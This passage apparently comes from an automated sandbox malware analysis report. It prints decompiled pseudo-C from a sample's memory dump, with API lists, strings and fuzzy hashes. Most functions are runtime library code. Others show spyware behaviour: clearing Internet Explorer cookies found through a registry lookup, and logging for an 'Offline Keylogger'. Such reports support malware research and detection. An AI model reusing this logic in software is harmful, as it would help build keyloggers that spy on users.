																						L0043EE85( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
																						L0043EE85(_v740);
																						 *(_t432 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t465;
																	return E0042F61B(_v16 ^ _t465);
																}
															} else {
																_t330 = _t447 + _t447;
																__eflags = _t330 - 0x106;
																if(_t330 >= 0x106) {
																	E0042F74F();
																	goto L82;
																} else {
																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
																	_t332 =  &_v276;
																	_push(_t332);
																	_push(_v460);
																	_push(_t428);
																	L83();
																	_t472 = _t475 + 0xc;
																	__eflags = _t332;
																	_t268 = _v452;
																	if(_t332 != 0) {
																		_t268 = _t268 + 1;
																		_v452 = _t268;
																	}
																	L54:
																	_t444 = _t359 + _t447 * 2;
																	_t370 = 0;
																	__eflags =  *_t444;
																	if( *_t444 == 0) {
																		L56:
																		__eflags = _t268;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t444 = _t444 + 2;
																		__eflags =  *_t444;
																		if( *_t444 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t333 = 0x3b;
														__eflags =  *_t359 - _t333;
														if( *_t359 != _t333) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t444;
						if(_t444 != 0) {
							_push(_t444);
							_push(_t249);
							_push(_t428);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t463;
						return E0042F61B(_v12 ^ _t463);
					}
				}
				L130:
			}

0x0043d1e1
0x0043d1e4
0x0043d1e6
0x0043d1e9
0x0043d1ea
0x0043d1f3
0x0043d1fb
0x0043d1fd
0x0043d1ff
0x0043d202
0x0043d31b
0x0043d320
0x0043d208
0x0043d208
0x0043d209
0x0043d209
0x0043d20c
0x0043d20f
0x0043d211
0x0043d214
0x0043d214
0x0043d217
0x0043d219
0x0043d21c
0x0043d221
0x0043d22f
0x0043d239
0x0043d23c
0x0043d23f
0x0043d23f
0x0043d24a
0x0043d24f
0x0043d254
0x00000000
0x0043d25a
0x0043d25d
0x0043d25d
0x0043d260
0x0043d262
0x0043d265
0x0043d265
0x0043d265
0x0043d267
0x0043d267
0x0043d267
0x0043d26d
0x00000000
0x00000000
0x0043d272
0x0043d289
0x0043d289
0x0043d274
0x0043d274
0x0043d27c
0x00000000
0x0043d27e
0x0043d27e
0x0043d281
0x0043d287
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d287
0x0043d27c
0x0043d292
0x0043d297
0x0043d299
0x0043d29e
0x0043d2a1
0x0043d2a4
0x0043d2a7
0x0043d2aa
0x0043d2ac
0x0043d2b1
0x0043d2bb
0x0043d2c3
0x0043d2cb
0x00000000
0x0043d2d1
0x0043d2d5
0x0043d322
0x0043d328
0x0043d32b
0x0043d32e
0x0043d330
0x0043d334
0x0043d338
0x0043d33a
0x0043d33d
0x0043d342
0x0043d338
0x0043d343
0x0043d346
0x0043d348
0x0043d34a
0x0043d34e
0x0043d34f
0x0043d351
0x0043d354
0x0043d359
0x0043d34f
0x0043d35c
0x0043d35f
0x0043d362
0x0043d365
0x0043d368
0x0043d368
0x0043d2d7
0x0043d2d7
0x0043d2da
0x0043d2dd
0x0043d2df
0x0043d2e3
0x0043d2e7
0x0043d2e9
0x0043d2ec
0x0043d2f1
0x0043d2e7
0x0043d2f2
0x0043d2f7
0x0043d2f9
0x0043d2fe
0x0043d300
0x0043d303
0x0043d308
0x0043d2fe
0x0043d309
0x0043d30d
0x0043d30d
0x0043d310
0x0043d314
0x0043d317
0x0043d317
0x00000000
0x0043d31a
0x00000000
0x0043d2cb
0x0043d28d
0x0043d28f
0x0043d28f
0x00000000
0x0043d28f
0x0043d36f
0x0043d370
0x0043d371
0x0043d372
0x0043d373
0x0043d374
0x0043d379
0x0043d37c
0x0043d37d
0x0043d37f
0x0043d385
0x0043d38c
0x0043d38f
0x0043d392
0x0043d393
0x0043d394
0x0043d397
0x0043d398
0x0043d39b
0x0043d3a1
0x0043d3a3
0x0043d3c8
0x0043d3d2
0x0043d3d8
0x0043d3da
0x0043d3e0
0x0043d3e2
0x0043d635
0x0043d636
0x00000000
0x0043d3e8
0x0043d3e8
0x0043d3ec
0x0043d553
0x0043d553
0x0043d56a
0x0043d56f
0x0043d572
0x0043d574
0x0043d57a
0x0043d57a
0x0043d57c
0x0043d57c
0x0043d57f
0x0043d581
0x0043d587
0x0043d587
0x0043d589
0x0043d610
0x0043d610
0x0043d58f
0x0043d58f
0x0043d591
0x0043d597
0x0043d59a
0x0043d59d
0x0043d5a3
0x00000000
0x00000000
0x0043d5a5
0x0043d5a9
0x0043d5d2
0x0043d5d2
0x0043d5d4
0x0043d5ab
0x0043d5ab
0x0043d5af
0x0043d5b3
0x0043d5ba
0x0043d5c0
0x00000000
0x0043d5c2
0x0043d5c2
0x0043d5c5
0x0043d5c8
0x0043d5d0
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d5d0
0x0043d5c0
0x0043d5df
0x0043d5df
0x0043d5e1
0x0043d60f
0x0043d60f
0x00000000
0x0043d5e3
0x0043d5e3
0x0043d5e9
0x0043d5ea
0x0043d5eb
0x0043d5ec
0x0043d5f1
0x0043d5f7
0x0043d5fa
0x0043d5fc
0x0043d603
0x0043d605
0x0043d607
0x0043d5fe
0x0043d5fe
0x0043d5ff
0x00000000
0x0043d5ff
0x0043d5fc
0x00000000
0x0043d5e1
0x0043d5d8
0x0043d5da
0x0043d5dd
0x0043d5dd
0x00000000
0x0043d5dd
0x0043d616
0x0043d616
0x0043d617
0x0043d61a
0x0043d620
0x0043d620
0x0043d629
0x0043d62b
0x00000000
0x0043d62d
0x0043d62d
0x00000000
0x0043d62d
0x0043d62b
0x00000000
0x0043d3f2
0x0043d3f2
0x0043d3f7
0x00000000
0x0043d3fd
0x0043d3fd
0x0043d402
0x00000000
0x0043d408
0x0043d408
0x0043d40e
0x0043d413
0x0043d415
0x0043d41c
0x0043d41d
0x0043d41f
0x00000000
0x00000000
0x0043d425
0x0043d425
0x0043d429
0x0043d42f
0x00000000
0x0043d435
0x0043d437
0x0043d438
0x0043d43b
0x00000000
0x0043d441
0x0043d441
0x0043d447
0x0043d44c
0x0043d456
0x0043d45a
0x0043d45f
0x0043d462
0x0043d464
0x00000000
0x0043d466
0x0043d466
0x0043d468
0x0043d46b
0x0043d46b
0x0043d46e
0x0043d471
0x0043d471
0x0043d47c
0x0043d47e
0x0043d480
0x00000000
0x00000000
0x0043d480
0x00000000
0x0043d482
0x0043d482
0x0043d488
0x0043d48b
0x0043d48b
0x0043d499
0x0043d4a2
0x0043d4a7
0x0043d4ad
0x0043d4b0
0x0043d4b1
0x0043d4b3
0x0043d4c1
0x0043d4c1
0x0043d4c8
0x0043d529
0x00000000
0x0043d4ca
0x0043d4ca
0x0043d4d8
0x0043d4dd
0x0043d4e0
0x0043d4e2
0x0043d652
0x0043d654
0x0043d655
0x0043d656
0x0043d657
0x0043d658
0x0043d659
0x0043d65e
0x0043d661
0x0043d662
0x0043d66a
0x0043d671
0x0043d674
0x0043d675
0x0043d678
0x0043d67c
0x0043d67d
0x0043d680
0x0043d690
0x0043d69c
0x0043d6b3
0x0043d6b8
0x0043d6bb
0x0043d6bd
0x0043d6d2
0x0043d6d5
0x0043d6d5
0x0043d6d8
0x0043d6de
0x0043d6e7
0x0043d6e9
0x0043d6ec
0x0043d6f3
0x0043d6f6
0x0043d6fc
0x00000000
0x00000000
0x0043d6fe
0x0043d702
0x0043d72b
0x0043d72b
0x0043d704
0x0043d704
0x0043d708
0x0043d70c
0x0043d713
0x0043d719
0x00000000
0x0043d71b
0x0043d71b
0x0043d71e
0x0043d721
0x0043d729
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d729
0x0043d719
0x0043d738
0x0043d738
0x0043d73a
0x0043d740
0x0043d746
0x0043d749
0x0043d749
0x0043d74c
0x0043d74f
0x0043d74f
0x0043d75f
0x0043d76d
0x0043d772
0x0043d779
0x0043d77b
0x00000000
0x0043d781
0x0043d787
0x0043d78d
0x0043d794
0x0043d79a
0x0043d79d
0x0043d7a3
0x0043d7b0
0x0043d7b7
0x0043d7bc
0x0043d7bf
0x0043d7c1
0x0043da1a
0x0043da20
0x0043da21
0x0043da22
0x0043da23
0x0043da24
0x0043da25
0x0043da2a
0x0043da2b
0x0043da30
0x0043d7c7
0x0043d7c7
0x0043d7d5
0x0043d7d8
0x0043d7f3
0x0043d7fa
0x0043d800
0x0043d806
0x0043d7da
0x0043d7da
0x0043d7e2
0x00000000
0x0043d7e4
0x0043d7e4
0x0043d7ea
0x0043d7ea
0x0043d7e2
0x0043d80d
0x0043d810
0x0043d92d
0x0043d930
0x0043d93d
0x0043d940
0x0043d948
0x0043d948
0x0043d932
0x0043d938
0x0043d938
0x0043d816
0x0043d816
0x0043d81c
0x0043d824
0x0043d826
0x0043d829
0x0043d832
0x0043d83b
0x0043d841
0x0043d841
0x0043d844
0x0043d846
0x00000000
0x00000000
0x0043d848
0x0043d84e
0x0043d84f
0x0043d85a
0x0043d862
0x0043d86a
0x0043d86d
0x0043d870
0x0043d876
0x0043d87c
0x0043d882
0x0043d888
0x0043d88b
0x00000000
0x00000000
0x0043d88d
0x0043d8b2
0x0043d8b2
0x0043d8b5
0x0043d8b9
0x0043d8d2
0x0043d8d7
0x0043d8da
0x0043d8dc
0x0043d8e2
0x0043d91d
0x0043d8e4
0x0043d8e4
0x0043d8e9
0x0043d8f1
0x0043d8f2
0x0043d8f2
0x0043d909
0x0043d910
0x0043d913
0x0043d918
0x0043d918
0x0043d920
0x0043d923
0x0043d923
0x0043d928
0x00000000
0x0043d928
0x0043d88f
0x0043d891
0x0043d896
0x0043d89c
0x0043d8a5
0x0043d8ae
0x0043d8ae
0x00000000
0x0043d891
0x0043d94b
0x0043d94b
0x0043d94f
0x0043d957
0x0043d95d
0x0043d960
0x0043d966
0x0043d968
0x0043d9a8
0x0043d9ae
0x0043d9b5
0x0043d9b5
0x0043d9bb
0x0043d9bf
0x00000000
0x0043d9c1
0x0043d9c1
0x0043d9c5
0x0043d9ca
0x0043d9ce
0x0043d9d3
0x0043d9da
0x0043d9e8
0x0043d9ee
0x0043d9f1
0x0043d9f1
0x0043d9bf
0x0043da00
0x0043da08
0x0043da11
0x0043d96a
0x0043d970
0x0043d973
0x0043d97a
0x0043d98c
0x0043d993
0x0043d9a0
0x00000000
0x0043d9a0
0x00000000
0x0043d968
0x0043d7c1
0x0043d73c
0x00000000
0x0043d73c
0x00000000
0x0043d73a
0x0043d733
0x0043d735
0x0043d735
0x00000000
0x0043d6bf
0x0043d6bf
0x0043d6bf
0x0043d6c1
0x0043d6c6
0x0043d6d1
0x0043d6d1
0x0043d4e8
0x0043d4e8
0x0043d4eb
0x0043d4f0
0x0043d64d
0x00000000
0x0043d4f6
0x0043d4f8
0x0043d500
0x0043d506
0x0043d507
0x0043d50d
0x0043d50e
0x0043d513
0x0043d516
0x0043d518
0x0043d51e
0x0043d520
0x0043d521
0x0043d521
0x0043d52f
0x0043d52f
0x0043d532
0x0043d534
0x0043d537
0x0043d545
0x0043d545
0x0043d62f
0x0043d62f
0x00000000
0x0043d631
0x0043d631
0x00000000
0x0043d539
0x0043d539
0x0043d53c
0x0043d53f
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d53f
0x0043d537
0x0043d4f0
0x0043d4e2
0x0043d4b5
0x0043d4b7
0x0043d4b8
0x0043d4bb
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d4bb
0x0043d4b3
0x0043d43b
0x00000000
0x0043d42f
0x00000000
0x0043d54c
0x0043d402
0x0043d3f7
0x0043d3ec
0x0043d3a5
0x0043d3a5
0x0043d3a7
0x0043d3a9
0x0043d3aa
0x0043d3ab
0x0043d3ac
0x0043d3b1
0x0043d63c
0x0043d641
0x0043d64c
0x0043d64c
0x0043d3a3
0x00000000

APIs

Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,0042F939,?,?,00431057,?,?,?,?,?,0040BA4E,0042F939,?,?,?,?), ref: 0043E64F

_free.LIBCMT ref: 0043D2EC
_free.LIBCMT ref: 0043D303
_free.LIBCMT ref: 0043D322
_free.LIBCMT ref: 0043D33D
_free.LIBCMT ref: 0043D354

Strings

sE, xrefs: 0043D2C6

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _free$AllocHeap
String ID: sE
API String ID: 1835388192-3868527542
Opcode ID: 222053663b1a417d39008c9379da4a7b3a05fbc3ccea2e8f76e9df36c6102ab7
Instruction ID: af8df24ae55f722775fb3ee277683ae55e0fcf911b6e467c94d3c9977f85d582
Opcode Fuzzy Hash: 222053663b1a417d39008c9379da4a7b3a05fbc3ccea2e8f76e9df36c6102ab7
Instruction Fuzzy Hash: FD51E371E002049FDB209F6AE842A6B77F4EF5C724F1416AEE809D7250E739ED01CB49

Uniqueness

Uniqueness Score: -1.00%

Function 004437EC, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004437EC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x46a00c; // 0x44c884ad
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46b800 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x46b800 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E0043E036(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E004422AE( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E004422AE();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0042F61B(_v8 ^ _t136);
			}

0x004437f4
0x004437fb
0x004437fe
0x00443806
0x0044380a
0x00443816
0x00443819
0x0044381c
0x00443823
0x0044382b
0x0044382e
0x00443834
0x0044383a
0x0044383f
0x00443841
0x00443844
0x00443849
0x00443853
0x0044385a
0x0044385d
0x00443864
0x0044386b
0x00443897
0x004438bd
0x004438bf
0x00000000
0x00443899
0x0044389c
0x00443963
0x0044396f
0x0044397a
0x0044397f
0x004438a2
0x004438a9
0x004438ae
0x004438b4
0x004438ba
0x00000000
0x004438ba
0x004438b4
0x0044389c
0x0044386d
0x00443871
0x00443874
0x0044387a
0x0044387c
0x0044387f
0x00443883
0x004438c0
0x004438c3
0x004438c4
0x004438c9
0x004438cf
0x004438d5
0x004438e4
0x004438ea
0x004438f0
0x004438f5
0x00443911
0x00443984
0x0044398a
0x00443913
0x0044391b
0x00443924
0x0044392a
0x00000000
0x0044392c
0x0044392e
0x00443931
0x0044394a
0x00000000
0x0044394c
0x00443950
0x00443952
0x00443955
0x00000000
0x00443955
0x00443950
0x0044394a
0x0044392a
0x00443924
0x00443911
0x004438f5
0x004438cf
0x00000000
0x00443958
0x00443958
0x0044398c
0x0044399e

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00443F61,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044382E
__fassign.LIBCMT ref: 004438A9
__fassign.LIBCMT ref: 004438C4
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 004438EA
WriteFile.KERNEL32(?,FF8BC35D,00000000,00443F61,00000000,?,?,?,?,?,?,?,?,?,00443F61,?), ref: 00443909
WriteFile.KERNEL32(?,?,00000001,00443F61,00000000,?,?,?,?,?,?,?,?,?,00443F61,?), ref: 00443942

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 66d6eff364102b284a7c0bc5fdcf6333283dc1297cb1b8055ba140da389d8a51
Instruction ID: 2257eea9d661a44ad8950c31b3f1cc9a1c274aacc0cefe8ff3c2634c143855f4
Opcode Fuzzy Hash: 66d6eff364102b284a7c0bc5fdcf6333283dc1297cb1b8055ba140da389d8a51
Instruction Fuzzy Hash: 2951D0B0A006099FDB14CFA8D881AEEFBF8EF09701F14406BE941E7251E3749A45CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7A6, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040A7A6(void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v340;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t20;
				int _t34;
				void* _t40;
				void* _t41;
				char* _t42;
				void* _t48;
				char* _t55;
				void* _t59;
				void* _t61;
				void* _t62;

				_t42 =  &_v28;
				E004020B5(_t40, _t42);
				_push(_t42);
				_t41 = 0;
				_t17 = E004102D2( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
				_t62 = _t61 + 0xc;
				L00401FB1( &_v28, 0x80000001, _t59, _t17);
				L00401FA7();
				_t58 = 0x45f6ac;
				_t20 = E00405A22(0x45f6ac);
				_t66 = _t20;
				if(_t20 == 0) {
					ExpandEnvironmentStringsA(L00401F75( &_v28),  &_v340, 0x104);
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
						goto L1;
					} else {
						E00402064(0,  &_v52,  &_v340);
						_t58 =  &_v52;
						_t34 = E004170AC(L00401ECB(L00416C32( &_v76,  &_v52)));
						L00401ED0();
						_t55 =  &_v52;
						L00401FA7();
						__eflags = _t34;
						if(__eflags == 0) {
							_push(_t55);
							_push(_t55);
							__eflags = E0040AAB0();
							if(__eflags != 0) {
								_t41 = 1;
								E00402064(1, _t62 - 0x18, "\n[IE cookies cleared!]");
								E0040AA8C(1,  &_v52, __eflags);
								goto L8;
							}
						} else {
							_t48 = _t62 - 0x18;
							_push("\n[IE cookies cleared!]");
							goto L2;
						}
					}
				} else {
					L1:
					_t48 = _t62 - 0x18;
					_push("\n[IE cookies not found]");
					L2:
					E00402064(_t41, _t48);
					E0040AA8C(_t41, _t58, _t66);
					_t41 = 1;
					L8:
				}
				L00401FA7();
				return _t41;
			}

0x0040a7af
0x0040a7b4
0x0040a7b9
0x0040a7cc
0x0040a7ce
0x0040a7d3
0x0040a7da
0x0040a7e2
0x0040a7e7
0x0040a7ef
0x0040a7f4
0x0040a7f6
0x0040a828
0x0040a83b
0x0040a83d
0x00000000
0x0040a83f
0x0040a849
0x0040a84e
0x0040a862
0x0040a86c
0x0040a871
0x0040a874
0x0040a879
0x0040a87b
0x0040a88c
0x0040a88d
0x0040a893
0x0040a895
0x0040a89a
0x0040a8a3
0x0040a8a8
0x00000000
0x0040a8a8
0x0040a87d
0x0040a880
0x0040a882
0x00000000
0x0040a882
0x0040a87b
0x0040a7f8
0x0040a7f8
0x0040a7fb
0x0040a7fd
0x0040a802
0x0040a802
0x0040a807
0x0040a80c
0x0040a8ad
0x0040a8ad
0x0040a8b3
0x0040a8bf

APIs

Part of subcall function 004102D2: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,00000000,00000000), ref: 004102F4
Part of subcall function 004102D2: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000400), ref: 00410313
Part of subcall function 004102D2: RegCloseKey.ADVAPI32(00000000), ref: 0041031C

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A828
PathFileExistsA.SHLWAPI(?), ref: 0040A835

Strings

[IE cookies cleared!], xrefs: 0040A882, 0040A89E
[IE cookies not found], xrefs: 0040A7FD
Cookies, xrefs: 0040A7BA
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040A7BF

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: e0be6ba8a48d152d47865127889dc3c574c72ce6169164aabf6e532e9c89126c
Instruction ID: 86840d2655219e895a2e3310a5aa52ddb93a2453b48acae1739db4ed104c70da
Opcode Fuzzy Hash: e0be6ba8a48d152d47865127889dc3c574c72ce6169164aabf6e532e9c89126c
Instruction Fuzzy Hash: 8621BF31A102055ACB18B7B1CC5BDEE77689F15304F80013FB901B71D2EA7C9A5ACA9A

Uniqueness

Uniqueness Score: -1.00%

Function 0044FA43, Relevance: 10.6, APIs: 7, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0044FA43(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						L00440D5D(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E0043E61D(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									L00439DDE(GetLastError());
								}
							}
							L0043EE85(_t40);
							_t14 = _t35;
						} else {
							L00439DDE(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(L00439E14())) = 0x16;
						E0043626D();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(L00439E14())) = 0x16;
				E0043626D();
				return 0;
			}

0x0044fa48
0x0044fa4d
0x0044fa67
0x0044fa6a
0x0044fa6c
0x0044fa85
0x0044fa87
0x0044fa8e
0x0044fa90
0x0044fa99
0x0044fa9a
0x0044fa9e
0x0044faa4
0x0044faa7
0x0044faa9
0x0044fac3
0x0044fac6
0x0044fac8
0x0044fad5
0x0044fadb
0x0044fadd
0x0044faf1
0x0044faf3
0x0044faf7
0x0044faf7
0x0044faf8
0x0044fadf
0x0044fae6
0x0044faeb
0x0044fadd
0x0044fafb
0x0044fb00
0x0044faab
0x0044fab2
0x0044fab7
0x0044fab7
0x0044fa6e
0x0044fa73
0x0044fa79
0x0044fa7e
0x0044fa7e
0x00000000
0x0044fb05
0x0044fa54
0x0044fa5a
0x00000000

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1ae5b740f8da789ad276d17f4701bbcfea38a7d231bcf3659a6f26bf5d9fdc5
Instruction ID: a1c109c1609699d4209c0352da68e76d0abf83c28ba15cddbfee87ef62dca71a
Opcode Fuzzy Hash: a1ae5b740f8da789ad276d17f4701bbcfea38a7d231bcf3659a6f26bf5d9fdc5
Instruction Fuzzy Hash: DE112472504215BFEB216FB28C0596B3A6CDF86761F11416AB829D7281DA78CD05C278

Uniqueness

Uniqueness Score: -1.00%

Function 00409636, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74
timeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00409636(void* __ebx, void* __ecx, void* __eflags, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __edi;
				void* __esi;
				WCHAR* _t33;
				void* _t65;
				void* _t67;
				void* _t70;

				_t70 = __eflags;
				_t42 = __ebx;
				_t67 = __ecx;
				GetLocalTime( &_v20);
				L00401EDA( &_a4, _t26, _t67, E00403086(__ebx,  &_v44, L00409E6B( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t70,  &_a4), _t65, _t70, L"]\r\n"));
				L00401ED0();
				L00401ED0();
				_push(0x64 + E00402469() * 2);
				_t33 = L00438E06( &_a4);
				_t66 = _t33;
				_push(_v20.wSecond & 0x0000ffff);
				_push(_v20.wMinute & 0x0000ffff);
				_push(_v20.wHour & 0x0000ffff);
				_push(_v20.wDay & 0x0000ffff);
				_push(_v20.wMonth & 0x0000ffff);
				_push(_v20.wYear & 0x0000ffff);
				wsprintfW(_t33, L00401ECB( &_a4));
				if( *((char*)(_t67 + 0x49)) != 0) {
					E0040766E(__ebx, _t67 + 4, _t66, _t66);
				}
				if( *((char*)(_t67 + 0x4a)) != 0) {
					E0040766E(_t42, _t67 + 0x1c, _t66, _t66);
					SetEvent( *(_t67 + 0x3c));
				}
				L00438E01(_t66);
				return L00401ED0();
			}

0x00409636
0x00409636
0x00409641
0x00409644
0x00409670
0x00409678
0x00409680
0x00409694
0x00409695
0x0040969f
0x004096a5
0x004096aa
0x004096af
0x004096b4
0x004096b9
0x004096ba
0x004096c5
0x004096d2
0x004096d8
0x004096d8
0x004096e1
0x004096e7
0x004096ef
0x004096ef
0x004096f6
0x00409709

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409644

Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B

wsprintfW.USER32 ref: 004096C5
SetEvent.KERNEL32(?,00000000), ref: 004096EF

Strings

